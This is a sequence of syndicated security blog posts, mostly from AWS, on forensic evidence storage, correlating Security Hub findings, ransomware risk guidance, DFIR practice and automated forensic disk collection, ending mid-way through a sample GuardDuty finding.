An example use case of Amazon EBS disks being shared as evidence to the forensics account, the following figure—Figure 2—is a simplified S3 bucket folder structure you could use to store and work with evidence.

Figure 2 shows an S3 bucket structure for a forensic account. An S3 bucket and folder is created to hold incoming data—for example, from Amazon EBS disks—which is streamed to Incoming Data > Evidence Artifacts using dc3dd. The data is then copied from there to a folder in another bucket—Active Investigation > Root Directory > Extracted Artifacts—to be analyzed by the tooling installed on your forensic Amazon EC2 instance. Also, there are folders under Active Investigation for any investigation notes you make during analysis, as well as the final reports, which are discussed at the end of this blog post. Finally, a bucket and folders for legal holds, where an object lock will be placed to hold evidence artifacts at a specific version.

Figure 2: Forensic account S3 bucket structure

Figure 2: Forensic account S3 bucket structure

Considerations

Finally, depending on the severity of the incident, your on-premises network and infrastructure might also be compromised. Having an alternative environment for your security responders to use in case of such an event reduces the chance of not being able to respond in an emergency. Amazon services such as Amazon Workspaces—a fully managed persistent desktop virtualization service—can be used to provide your responders a ready-to-use, independent environment that they can use to access the digital forensics and incident response tools needed to perform incident-related tasks.

Aside from the investigative tools, communications services are among the most critical for coordination of response. You can use Amazon WorkMail and Amazon Chime to provide that capability independent of normal channels.

Conclusion

The goal of a forensic investigation is to provide a final report that’s supported by the evidence. This includes what was accessed, who might have accessed it, how it was accessed, whether any data was exfiltrated, and so on. This report might be necessary for legal circumstances, such as criminal or civil investigations or situations requiring breach notifications. What output each circumstance requires should be determined in advance in order to develop an appropriate response and reporting process for each. A root cause analysis is vital in providing the information required to prepare your resources and environment to help prevent a similar incident in the future. Reports should not only include a root cause analysis, but also provide the methods, steps, and tools used to arrive at the conclusions.

This article has shown you how you can get started creating and maintaining forensic environments, as well as enable your teams to perform advanced incident resolution investigations using AWS services. Implementing the groundwork for your forensics environment, as described above, allows you to use automated disk collection to begin iterating on your forensic data collection capabilities and be better prepared when security events occur.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on one of the AWS Security, Identity, and Compliance forums or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Sol Kavanagh

Sol is a senior solutions architect and CISSP with 20+ years of experience in the enterprise space. He is passionate about security and helping customers build solutions in the AWS Cloud. In his spare time he enjoys distance cycling, adventure travelling, Buddhist philosophy, and Muay Thai.

Correlate security findings with AWS Security Hub and Amazon EventBridge

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/correlate-security-findings-with-aws-security-hub-and-amazon-eventbridge/

In this blog post, we’ll walk you through deploying a solution to correlate specific AWS Security Hub findings from multiple AWS services that are related to a single AWS resource, which indicates an increased possibility that a security incident has happened.

AWS Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, Amazon Macie, AWS Firewall Manager, AWS Identity and Access Management (IAM) Access Analyzer, and AWS Systems Manager Patch Manager. Findings from each service are normalized into the AWS Security Finding Format (ASFF), so that you can review findings in a standardized format and take action quickly. You can use AWS Security Hub to provide a single view of all security-related findings, where you can set up alerting, automatic remediation, and ingestion into third-party incident management systems for specific findings.

Although Security Hub can ingest a vast number of integrations and findings, it cannot create correlation rules like a Security Information and Event Management (SIEM) tool can. However, you can create such rules using EventBridge. It’s important to take a closer look when multiple AWS security services generate findings for a single resource, because this potentially indicates elevated risk. Depending on your environment, the initial number of findings in AWS Security Hub findings may be high, so you may need to prioritize which findings require immediate action. AWS Security Hub natively gives you the ability to filter findings by resource, account, and many other details. With the solution in this post, when one of these correlated sets of findings is detected, a new finding is created and pushed to AWS Security Hub by using the Security Hub BatchImportFindings API operation. You can then respond to these new security incident-oriented findings through ticketing, chat, or incident management systems.

Prerequisites

This solution requires that you have AWS Security Hub enabled in your AWS account. In addition to AWS Security Hub, the following services must be enabled and integrated to AWS Security Hub:

Solution overview

In this solution, you will use a combination of AWS Security Hub, Amazon EventBridge, AWS Lambda, and Amazon DynamoDB to ingest and correlate specific findings that indicate a higher likelihood of a security incident. Each correlation is focused on multiple specific AWS security service findings for a single AWS resource.

The following list shows the correlated findings that are detected by this solution. The Description section for each finding correlation provides context for that correlation, the Remediation section provides general recommendations for remediation, and the Prevention/Detection section provides guidance to either prevent or detect one or more findings within the correlation. With the code provided, you can also add more correlations than those listed here by modifying the Cloud Development Kit (CDK) code and AWS Lambda code. The Solution workflow section breaks down the flow of the solution. If you choose to implement automatic remediation, each finding correlation will be created with the following AWS Security Hub Finding Format (ASFF) fields:

- Severity: CRITICAL
- ProductArn: arn:aws:securityhub:<REGION>:<AWS_ACCOUNT_ID>:product/<AWS_ACCOUNT_ID>/default

These correlated findings are created as part of this solution:

  1. Any Amazon GuardDuty Backdoor findings and three critical common vulnerabilities and exposures (CVEs) from Amazon Inspector that are associated with the same Amazon Elastic Compute Cloud (Amazon EC2) instance.
    • Description: Amazon Inspector has found at least three critical CVEs on the EC2 instance. CVEs indicate that the EC2 instance is currently vulnerable or exposed. The EC2 instance is also performing backdoor activities. The combination of these two findings is a stronger indication of an elevated security incident.
    • Remediation: It’s recommended that you isolate the EC2 instance and follow standard protocol to triage the EC2 instance to verify if the instance has been compromised. If the instance has been compromised, follow your standard Incident Response process for post-instance compromise and forensics. Redeploy a backup of the EC2 instance by using an up-to-date hardened Amazon Machine Image (AMI) or apply all security-related patches to the redeployed EC2 instance.
    • Prevention/Detection: To mitigate or prevent an Amazon EC2 instance from missing critical security updates, consider using Amazon Systems Manager Patch Manager to automate installing security-related patching for managed instances. Alternatively, you can provide developers up-to-date hardened Amazon Machine Images (AMI) by using Amazon EC2 Image Builder. For detection, you can set the AMI property called ‘DeprecationTime’ to indicate when the AMI will become outdated and respond accordingly.
  2. An Amazon Macie sensitive data finding and an Amazon GuardDuty S3 exfiltration finding for the same Amazon Simple Storage Service (Amazon S3) bucket.
    • Description: Amazon Macie has scanned an Amazon S3 bucket and found a possible match for sensitive data. Amazon GuardDuty has detected a possible exfiltration finding for the same Amazon S3 bucket. The combination of these findings indicates a higher risk security incident.
    • Remediation: It’s recommended that you review the source IP and/or IAM principal that is making the S3 object reads against the S3 bucket. If the source IP and/or IAM principal is not authorized to access sensitive data within the S3 bucket, follow your standard Incident Response process for post-compromise plan for S3 exfiltration. For example, you can restrict an IAM principal’s permissions, revoke existing credentials or unauthorized sessions, restricting access via the Amazon S3 bucket policy, or using the Amazon S3 Block Public Access feature.
    • Prevention/Detection: To mitigate or prevent exposure of sensitive data within Amazon S3, ensure the Amazon S3 buckets are using least-privilege bucket policies and are not publicly accessible. Alternatively, you can use the Amazon S3 Block Public Access feature. Review your AWS environment to make sure you are following Amazon S3 security best practices. For detection, you can use Amazon Config to track and auto-remediate Amazon S3 buckets that do not have logging and encryption enabled or publicly accessible.
  3. AWS Security Hub detects an EC2 instance with a public IP and unrestricted VPC Security Group; Amazon GuardDuty unusual network traffic behavior finding; and Amazon GuardDuty brute force finding.
    • Description: AWS Security Hub has detected an EC2 instance that has a public IP address attached and a VPC Security Group that allows traffic for ports outside of ports 80 and 443. Amazon GuardDuty has also determined that the EC2 instance has multiple brute force attempts and is communicating with a remote host on an unusual port that the EC2 instance has not previously used for network communication. The correlation of these lower-severity findings indicates a higher-severity security incident.
    • Remediation: It’s recommended that you isolate the EC2 instance and follow standard protocol to triage the EC2 instance to verify if the instance has been compromised. If the instance has been compromised, follow your standard Incident Response process for post-instance compromise and forensics.
    • Prevention/Detection: To mitigate or prevent these events from occurring within your AWS environment, determine whether the EC2 instance requires a public-facing IP address and review the VPC Security Group(s) has only the required rules configured. Review your AWS environment to make sure you are following Amazon EC2 best practices. For detection, consider implementing AWS Firewall Manager to continuously audit and limit VPC Security Groups.

The solution workflow, shown in Figure 1, is as follows:

  1. Security Hub ingests findings from integrated AWS security services.
  2. An EventBridge rule is invoked based on Security Hub findings in GuardDuty, Macie, Amazon Inspector, and Security Hub security standards.
  3. The EventBridge rule invokes a Lambda function to store the Security Hub finding, which is passed via EventBridge, in a DynamoDB table for further analysis.
  4. After the new findings are stored in DynamoDB, another Lambda function is invoked by using Dynamo StreamSets and a time-to-live (TTL) set to delete finding entries that are older than 30 days.
  5. The second Lambda function looks at the resource associated with the new finding entry in the DynamoDB table. The Lambda function checks for specific Security Hub findings that are associated with the same resource.
Figure 1: Architecture diagram describing the flow of the solution

Figure 1: Architecture diagram describing the flow of the solution

Solution deployment

You can deploy the solution through either the AWS Management Console or the AWS Cloud Development Kit (AWS CDK).

To deploy the solution by using the AWS Management Console

In your account, launch the AWS CloudFormation template by choosing the following Launch Stack button. It will take approximately 10 minutes for the CloudFormation stack to complete.
Select the Launch Stack button to launch the template

To deploy the solution by using the AWS CDK

You can find the latest code in the aws-security GitHub repository where you can also contribute to the sample code. The following commands show how to deploy the solution by using the AWS CDK. First, the CDK initializes your environment and uploads the AWS Lambda assets to Amazon S3. Then, you can deploy the solution to your account. For <INSERT_AWS_ACCOUNT>, specify the account number, and for <INSERT_REGION>, specify the AWS Region that you want the solution deployed to.

cdk bootstrap aws://<INSERT_AWS_ACCOUNT>/<INSERT_REGION>

cdk deploy

Conclusion

In this blog post, we walked through a solution to use AWS services, including Amazon EventBridge, AWS Lambda, and Amazon DynamoDB, to correlate AWS Security Hub findings from multiple different AWS security services. The solution provides a framework to prioritize specific sets of findings that indicate a higher likelihood that a security incident has occurred, so that you can prioritize and improve your security response.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Marshall Jones

Marshall is a worldwide security specialist solutions architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Author

Jonathan Nguyen

Jonathan is a shared delivery team senior security consultant at AWS. His background is in AWS security, with a focus on threat detection and incident response. He helps enterprise customers develop a comprehensive AWS security strategy, deploy security solutions at scale, and train customers on AWS security best practices.

Introducing the Ransomware Risk Management on AWS Whitepaper

Post Syndicated from Temi Adebambo original https://aws.amazon.com/blogs/security/introducing-the-ransomware-risk-management-on-aws-whitepaper/

AWS recently released the Ransomware Risk Management on AWS Using the NIST Cyber Security Framework (CSF) whitepaper. This whitepaper aligns the National Institute of Standards and Technology (NIST) recommendations for security controls that are related to ransomware risk management, for workloads built on AWS. The whitepaper maps the technical capabilities to AWS services and implementation guidance. While this whitepaper is primarily focused on managing the risks associated with ransomware, the security controls and AWS services outlined are consistent with general security best practices.

The National Cybersecurity Center of Excellence (NCCoE) at NIST has published Practice Guides (NIST 1800-11, 1800-25, and 1800-26) to demonstrate how organizations can develop and implement security controls to combat the data integrity challenges posed by ransomware and other destructive events. Each of the Practice Guides include a detailed set of goals that are designed to help organizations establish the ability to identify, protect, detect, respond, and recover from ransomware events.

The Ransomware Risk Management on AWS Using the NIST Cyber Security Framework (CSF) whitepaper helps AWS customers confidently meet the goals of the Practice Guides the following categories:

Identify and protect

  • Identify systems, users, data, applications, and entities on the network.
  • Identify vulnerabilities in enterprise components and clients.
  • Create a baseline for the integrity and activity of enterprise systems in preparation for an unexpected event.
  • Create backups of enterprise data in advance of an unexpected event.
  • Protect these backups and other potentially important data against alteration.
  • Manage enterprise health by assessing machine posture.

Detect and respond

  • Detect malicious and suspicious activity generated on the network by users, or from applications that could indicate a data integrity event.
  • Mitigate and contain the effects of events that can cause a loss of data integrity.
  • Monitor the integrity of the enterprise for detection of events and after-the-fact analysis.
  • Use logging and reporting features to speed response time for data integrity events.
  • Analyze data integrity events for the scope of their impact on the network, enterprise devices, and enterprise data.
  • Analyze data integrity events to inform and improve the enterprise’s defenses against future attacks.

Recover

  • Restore data to its last known good configuration.
  • Identify the correct backup version (free of malicious code and data for data restoration).
  • Identify altered data, as well as the date and time of alteration.
  • Determine the identity/identities of those who altered data.

To achieve the above goals, the Practice Guides outline a set of technical capabilities that should be established, and provide a mapping between the generic application term and the security controls that the capability provides.

AWS services can be mapped to theses technical capabilities as outlined in the Ransomware Risk Management on AWS Using the NIST Cyber Security Framework (CSF) whitepaper. AWS offers a comprehensive set of services that customers can implement to establish the necessary technical capabilities to manage the risks associated with ransomware. By following the mapping in the whitepaper, AWS customers can identify which services, features, and functionality can help their organization identify, protect, detect, respond, and from ransomware events. If you’d like additional information about cloud security at AWS, please contact us.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Temi Adebambo

Temi is the Senior Manager for the America’s Security and Network Solutions Architect team. His team is focused on working with customers on cloud migration and modernization, cybersecurity strategy, architecture best practices, and innovation in the cloud. Before AWS, he spent over 14 years as a consultant, advising CISOs and security leaders.

Cybersecurity as Digital Detective Work: DFIR and Its 3 Key Components

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/09/03/cybersecurity-as-digital-detective-work-dfir-and-its-3-key-components/

Cybersecurity as Digital Detective Work: DFIR and Its 3 Key Components

Thanks to CSI and the many other crime-solving shows that have grasped our collective imagination for decades, we’re all at least somewhat familiar with the field of forensics and its unique appeal. At some point, anyone who’s watched these series has probably envisioned themselves in the detective’s shoes, piecing together the puzzle of a crime scene based on clues others might overlook — and bringing bad guys to justice at the end.

Cybersecurity lends itself particularly well to this analogy. It takes an expert eye and constant vigilance to stay a step ahead of the bad actors of the digital world. And after all, there aren’t many other areas in the modern tech landscape where the matter at hand is actual crime.

Digital forensics and incident response (DFIR) brings detective-like skills and processes to the forefront of cybersecurity practice. But what does DFIR entail, and how does it fit into your organization’s big-picture incident detection and response (IDR) approach? Let’s take a closer look.

What is DFIR — and are you already doing it?

Security expert Scott J. Roberts defines DFIR as “a multidisciplinary profession that focuses on identifying, investigating, and remediating computer-network exploitation.” If you hear that definition and think, “Hey, we’re already doing that,” that may because, in some sense, you already are.

Perhaps the best way to think of DFIR is not as a specific type of tech or category of tools, but rather as a methodology and a set of practices. Broadly speaking, it’s a field within the larger landscape of cybersecurity, and it can be part of your team’s incident response approach in the context of the IDR technology and workflows you’re already using.

To be good at cybersecurity, you have to be something of a detective — and the detective-like elements of the security practice, like log analysis and incident investigation, fit nicely within the DFIR framework. That means your organization is likely already practicing DFIR at some level, even though you might not have the full picture in place just yet.

3 key components of DFIR

The question is, how do you go from doing some DFIR practices piecemeal to a more integrated approach? And what are the benefits when you do it well? Here are 3 key components of a well-formulated DFIR practice.

1. Multi-system forensics

One of the hallmarks of DFIR is the ability to monitor and query all critical systems and asset types for indications of foul play. Roberts breaks this down into a few core functions, including file-system forensics, memory forensics, and network forensics. Each of these involves monitoring activity for signs of an attack on the system in question.

He also includes log analysis in this category. Although this is largely a tool-driven process these days, a SIEM or detection-and-response solution like InsightIDR can help teams keep on top of their logs and respond to the alerts that really matter.

2. Attack intelligence

Like a detective scouring the scene of a crime for that one clue that cracks the case, spotting suspicious network activity means knowing what to look for. There’s a reason why the person who solves the crime on our favorite detective shows is rarely the rookie and more often the grizzled veteran — a keen interpretative eye is formed by years of practice and skill-building.

For the practice of DFIR, this means developing the ability to think like an attacker, not only so you can identify and fix vulnerabilities in your own systems, but so that you can also spot the signs they’ve been exploited — if and when that happens. A pentesting tool like Metasploit provides a critical foundation for practicing DFIR with a high level of precision and insight.

3. Endpoint visibility

It’s no secret there are now more endpoints in corporate networks than ever before. The huge uptick in remote work during the COVID-19 pandemic has only increased the number and types of devices accessing company data and applications.

To do DFIR well in this context, security teams need visibility into this complex system of endpoints — and a way to clearly organize and interpret data gathered from them. A tool like Velociraptor can be critical in this effort, helping teams quickly collect and view digital forensic evidence from all of their endpoints, as well as proactively monitor them for suspicious activity.

A team effort

The powerful role open-source tools like Metasploit and Velociraptor can have in DFIR reminds us that incident response is a collaborative effort. Joining forces with other like-minded practitioners across the industry helps detection-and-response teams more effectively spot and stop attacks.

Velociraptor has launched a friendly competition to encourage knowledge-sharing within the field of DFIR. They’re looking for useful content and extensions to their open-source platform, with cash prizes for those that come up with submissions that add the most value and the best capabilities. The deadline is September 20, 2021, and there’s $5,000 on the line for the top entry.

Go head-to-head with other digital detectives

Submit to the 2021 Velociraptor Contributor Competition

How to automate forensic disk collection in AWS

Post Syndicated from Matt Duda original https://aws.amazon.com/blogs/security/how-to-automate-forensic-disk-collection-in-aws/

In this blog post you’ll learn about a hands-on solution you can use for automated disk collection across multiple AWS accounts. This solution will help your incident response team set up an automation workflow to capture the disk evidence they need to analyze to determine scope and impact of potential security incidents. This post includes AWS CloudFormation templates and all of the required AWS Lambda functions, so you can deploy this solution in your own environment. This post focuses primarily on two sources as the origination of the evidence collection workflow: AWS Security Hub and Amazon GuardDuty.

Why is automating forensic disk collection important?

AWS offers unique scaling capabilities in our compute environments. As you begin to increase your number of compute instances across multiple AWS accounts or organizations, you will find operational aspects of your business that must also scale. One of these critical operational tasks is the ability to quickly gather forensically sound disk and memory evidence during a security event.

During a security event, your incident response (IR) team must be able to collect and analyze evidence quickly while maintaining accuracy for the time period surrounding the event. It is both challenging and time consuming for the IR team to manually collect all of the relevant evidence in a cloud environment, across a large number of instances and accounts. Additionally, manual collection requires time that could otherwise be spent analyzing and responding to an event. Every role assumption, every console click, and every manual trigger required by the IR team, adds time for an attacker to continue to work through systems to meet their objectives.

Indicators of compromise (IoCs) are pieces of data that IR teams often use to identify potential suspicious activity within networks that might need further investigation. These IoCs can include file hashes, domains, IP addresses, or user agent strings. IoCs are used by services such as GuardDuty to help you discover potentially malicious activity in your accounts. For example, when you are alerted that an Amazon Elastic Compute Cloud (Amazon EC2) instance contains one or more IoCs, your IR team must gather a point-in-time copy of relevant forensic data to determine the root cause, and evaluate the likelihood that the finding requires action. This process involves gathering snapshots of any and all attached volumes, a live dump of the system’s memory, a capture of the instance metadata, and any logs that relate to the instance. These sources help your IR team to identify next steps and work towards a root cause.

It is important to take a point-in-time snapshot of an instance as close in time to the incident as possible. If there is a delay in capturing the snapshot, it can alter or make evidence unusable because the data has changed or been deleted. To take this snapshot quickly, you need a way to automate the collection and delivery of potentially hundreds of disk images while ensuring each snapshot is collected in the same way and without creating a bottleneck in the pipeline that could reduce the integrity of the evidence. In this blog post, I explain the details of the automated disk collection workflow, and explain why you might make different design decisions. You can download the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows.

AWS Security Hub provides an aggregated view of security findings across AWS accounts, including findings produced by GuardDuty, when enabled. Security Hub also provides you with the ability to ingest custom or third-party findings, which makes it an excellent starting place for automation. This blog post uses EC2 GuardDuty findings collected into Security Hub as the example, but you can also use the same process to include custom detection events, or alerts from partner solutions such as CrowdStrike, McAfee, Sophos, Symantec, or others.

Infrastructure overview

The workflow described in this post automates the tasks that an IR team commonly takes during the course of an investigation.

Overview of disk collection workflow

The high-level disk collection workflow steps are as follows:

  1. Create a snapshot of each Amazon Elastic Block Store (Amazon EBS) volume attached to suspected instances.
  2. Create a folder in the Amazon Simple Storage Service (Amazon S3) evidence bucket with the original event data.
  3. Launch one Amazon EC2 instance per EBS volume, to be used in streaming a bit-for-bit copy of the EBS snapshot volume. These EC2 instances are launched without SSH key pairs, to help prevent any unintentional evidence corruption and to ensure consistent processing without user interaction. The EC2 instances use third-party tools dc3dd and incrond to trigger and process volumes.
  4. Write all logs from the workflow and instances to Amazon CloudWatch Logs log groups, for audit purposes.
  5. Include all EBS volumes in the S3 evidence bucket as raw image files (.dd), with the metadata from the automated capture process, as well as hashes for validation and verification.

Overview of AWS services used in the workflow

Another way of looking at this high-level workflow is from the service perspective, as shown in Figure 1.

Figure 1: Service workflow for forensic disk collection

Figure 1: Service workflow for forensic disk collection

The workflow in Figure 1 shows the following steps:

  1. A GuardDuty finding is triggered for an instance in a monitored account. This example focuses on a GuardDuty finding, but the initial detection source can also be a custom event, or an event from a third party.
  2. The Security Hub service in the monitored account receives the GuardDuty finding, and forwards it to the Security Hub service in the security account.
  3. The Security Hub service in the security account receives the monitored account’s finding.
  4. The Security Hub service creates an event over Amazon EventBridge for the GuardDuty findings, which is then caught by an EventBridge rule to forward to the DiskForensicsInvoke Lambda function. The following is the example event rule, which is included in the deployment. This example can be expanded or reduced to fit your use-case. By default, the example is set to disabled in CloudFormation. When you are ready to use the automation, you will need to enable it.
    {
      "detail-type": [
        "Security Hub Findings - Imported"
      ],
      "source": [
        "aws.securityhub"
      ],
      "detail": {
        "findings": {
          "ProductFields": {
            "aws/securityhub/SeverityLabel": [
              "CRITICAL",
              "HIGH",
              "MEDIUM"
            ],
            "aws/securityhub/ProductName": [
              "GuardDuty"
            ]
          }
        }
      }
    }
    

  5. The DiskForensicsInvoke Lambda function receives the event from EventBridge, formats the event, and provides the formatted event as input to AWS Step Functions workflow.
  6. The DiskForensicStepFunction workflow includes ten Lambda functions, from initial snapshot to streaming the evidence to the S3 bucket. After the Step Functions workflow enters the CopySnapshot state, it converts to a map state. This allows the workflow to have one thread per volume submitted, and ensures that each volume will be placed in the evidence bucket as quickly as possible without needing to wait for other steps to complete.
    Figure 2: Forensic disk collection Step Function workflow

    Figure 2: Forensic disk collection Step Function workflow

    As shown in Figure 2, the following are the embedded Lambda functions in the DiskForensicStepFunction workflow:

    1. CreateSnapshot – This function creates the initial snapshots for each EBS volume attached to the instance in question. It also records instance metadata that is included with the snapshot data for each EBS volume.
      Required Environmental Variables: ROLE_NAME, EVIDENCE_BUCKET, LOG_GROUP
    2. CheckSnapshot – This function checks to see if the snapshots from the previous step are completed. If not, the function retries with an exponential backoff.
      Required Environmental Variable: ROLE_NAME
    3. CopySnapshot – This function copies the initial snapshot and ensures that it is using the forensics AWS Key Management Service (AWS KMS) key. This key is stored in the security account and will be used throughout the remainder of the process.
      Required Environmental Variables: ROLE_NAME, KMS_KEY
    4. CheckCopySnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function retries with exponential backoff.
      Required Environmental Variable: ROLE_NAME
    5. ShareSnapshot – This function takes the copied snapshot using the forensics KMS key, and shares it with the security account.
      Required Environmental Variables: ROLE_NAME, SECURITY_ACCOUNT
    6. FinalCopySnapshot – This function copies the shared snapshot into the security account, as the original shared snapshot is still owned by the monitored account. This ensures that a copy is available, in case it has to be referenced for additional processing later.
      Required Environmental Variable: KMS_KEY
    7. FinalCheckSnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function fails and it retries with an exponential backoff.
    8. CreateVolume – This function creates an EBS Magnetic volume from the snapshot in the previous step. These volumes created use magnetic disks, because they are required for consistent hash results from the dc3dd process. This volume cannot use a solid state drive (SSD), because the hash would be different each time. If the EBS Magnetic volume size is greater than or equal to 500GB, then Amazon EBS switches from using standard EBS Magnetic volumes to Throughput Optimized HDD (st1) volumes.
      Required Environmental Variables: KMS_KEY, SUPPORTED_AZS
    9. RunInstance – This function launches one EC2 instance per volume, to be used in streaming the volume to the S3 bucket. The AMI passed by the environmental variable needs to be created using the provided Amazon EC2 Image Builder pipeline before deploying the environment. This function also passes some user data to the instance, artifact bucket, source volume name, and the incidentID. This information is used by the instance when placing the evidence into the S3 bucket.
      Required Environmental Variables: AMI_ID, INSTANCE_PROFILE_NAME, VPC_ID, SECURITY_GROUP
    10. CreateInstanceWait – This function creates a 30-second wait, to allow the instance some additional time to spin up.
    11. MountForensicVolume – This function checks the CloudWatch log group ForensicDiskReadiness, to see that the incrond service is running on the instance. If the incrond service is running, the function attaches the volume to the instance and then writes the final logs to the S3 bucket and CloudWatch Logs.
      Required Environmental Variable: LOG_GROUP
  7. The instance that is created has pre-built tools and scripts on it from the template below using Image Builder. This instance uses the incrond tool to monitor /dev/disk/by-label for new devices being attached to the instance. After the MountForensicVolume Lambda function attaches the volume to the instance, a file is created in the /dev/disk/by-label directory for the attached volume. The incrond daemon starts the orchestrator script, which calls the collector script. The collector script uses the dc3dd tool to stream the bit-for-bit copy of the volume to S3. After the copy has completed, the image shuts down and is terminated. All logs from the process are sent to the S3 bucket and CloudWatch Logs.

The solution provided in the post includes the CloudFormation templates you need to get started, except for creation the initial EventBridge rule (which is provided in step 4 of the previous section). The solution includes an isolated VPC, subnets, security groups, roles, and more. The VPC provided does not provide any egress through an internet gateway or NAT gateway, and that is the recommended solution. The only connectivity provided is through the S3 gateway VPC endpoint and the CloudWatch Logs interface VPC endpoint (also deployed in the template).

Deploy the CloudFormation templates

To implement the solution outlined in this post, you need to deploy three separate AWS CloudFormation templates in the order described in this section.

diskForensicImageBuilder (security account)

First, you deploy diskForensicImageBuilder in the security account. This template contains the resources and AMIs needed to create and run the Image Builder pipeline that is required to build the collector VM. This pipeline installs the required binaries, and scripts, and updates the system.

Note: diskForensicImageBuilder is configured to use the default VPC and security group. If you have added restrictions or deleted your default VPC, you will need to modify the template.

To deploy the diskForensicImageBuilder template

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. Leave all default settings in place, and choose Next to configure the stack options.
  4. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to of the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  5. Choose Create Stack.
  6. After the Image Builder pipeline has been created, on the Image pipelines page, choose Actions and select Run pipeline to manually run the pipeline to create the base AMI.

    Figure 3: Run the new Image Builder pipeline

    Figure 3: Run the new Image Builder pipeline

diskForensics (security account)

Second, you deploy diskForensics in the security account. This is a nested CloudFormation stack containing four CloudFormation templates. The four CloudFormation templates are as follows:

  1. forensicResources – This stack holds all of the foundation for the solution, including the VPC and networking components, the S3 evidence bucket, CloudWatch log groups, and collectorVM instance profile.

    Figure 4: Forensics VPC

    Figure 4: Forensics VPC

  2. forensicFunctions – This stack contains all of the Lambda functions referenced in the Step Functions workflow as well as the role used by the Lambda functions.
  3. forensicStepFunction – This stack contains the Step Functions code, the role used by the Step Functions service, and the CloudWatch log group used by the service. It also contains an Amazon Simple Notification Service (SNS) topic used to alert on pipeline failure.
  4. forensicStepFunctionInvoke – This stack contains the DiskForensicsInvoke Lambda function and the role used by that Lambda function that allows it to call the Step Function workflow.

Note: You need to have the following required variables to continue:

  • ArtifactBucketName
  • ORGID
  • ForensicsAMI

If your accounts are not using AWS Organizations, you can use a dummy string for now. It adds a condition statement to the forensics KMS key that you can update or remove later.

To deploy the diskForensics stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the ORGID field, enter the AWS Organizations ID.

    Note: If you are not using AWS organizations, leave the default string. If you are deploying as multi-account without AWS Organizations, you will need to update the KMS key policy to remove the principalOrgID condition statements, and add the correct principals.

  4. For the ArtifactBucketName field, enter the S3 bucket name you would like to use for your forensic artifacts.

    Important: The ArtifactBucketName must be a globally unique name.

  5. For the ForensicsAMI field, enter the AMI ID for the image that was created by Image Builder.
  6. For the example in this post, leave the default values for all other fields. Customizing these fields allows you to customize this code example for your own purposes.
  7. Choose Next to configure the stack options and leave all default settings in place.
  8. Choose Next to review and scroll to the bottom of the page. Select the two check boxes under the Capabilities section, next to each of the acknowledgements:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
    • I acknowledge that AWS CloudFormation might require the following capability: CAPABILITY_AUTO_EXPAND.
  9. Choose Create Stack.
  10. After the stack has completed provisioning, subscribe to the Amazon SNS topic to receive pipeline alerts.

diskMember (each monitored account)

Third, you deploy diskMember in each monitored account. This stack contains the role and policy that the automation workflow needs to assume, so that it can create the initial snapshots and share the snapshot with the security account. If you are deploying this solution in a single account, you deploy diskMember in the security account.

Important: Ensure that all KMS keys that could be used to encrypt EBS volumes in each monitored account grant this role the ability to CreateGrant, Encrypt, Decrypt, ReEncrypt*, GenerateDataKey*, and Describe key. The default policy grants the permissions in AWS Identity and Access Management (IAM), but any restrictive resource policies could block the ability to create the initial snapshot and decrypt the snapshot when making the copy.

To deploy the diskMember stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
    If deploying across multiple accounts, consider using AWS CloudFormation StackSets for simplified multi-account deployment.
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the MasterAccountNum field, enter the account number for your security administrator account.
  4. Choose Next to configure the stack options and leave all default settings in place.
  5. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  6. Choose Create Stack.

Test the solution

Next, you can try this solution with an event sample to start the workflow.

To initiate a test run

  1. Copy the following example GuardDuty event. The example uses the AWS Region us-east-1, but you can update the example to use another Region. Be sure to replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.
    {
      “SchemaVersion”: “2018-10-08”,
      “Id”: “arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500”,
      “ProductArn”: “arn:aws:securityhub:us-east-1::product/aws/guardduty”,
      “GeneratorId”: “arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14”,
      “AwsAccountId”: “0123456789012”,
      “Types”: [
        “Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient”
      ],
      “FirstObservedAt”: “2020-10-22T03:52:13.438Z”,
      “LastObservedAt”: “2020-10-22T03:52:13.438Z”,
      “CreatedAt”: “2020-10-22T03:52:13.438Z”,
      “UpdatedAt”: “2020-10-22T03:52:13.438Z”,
      “Severity”: {
        “Product”: 8,
        “Label”: “HIGH”,
        “Normalized”: 60
      },
      “Title”: “EC2 instance i-99999999 is communicating with Tor Entry node.”,
      “Description”: “EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.”,
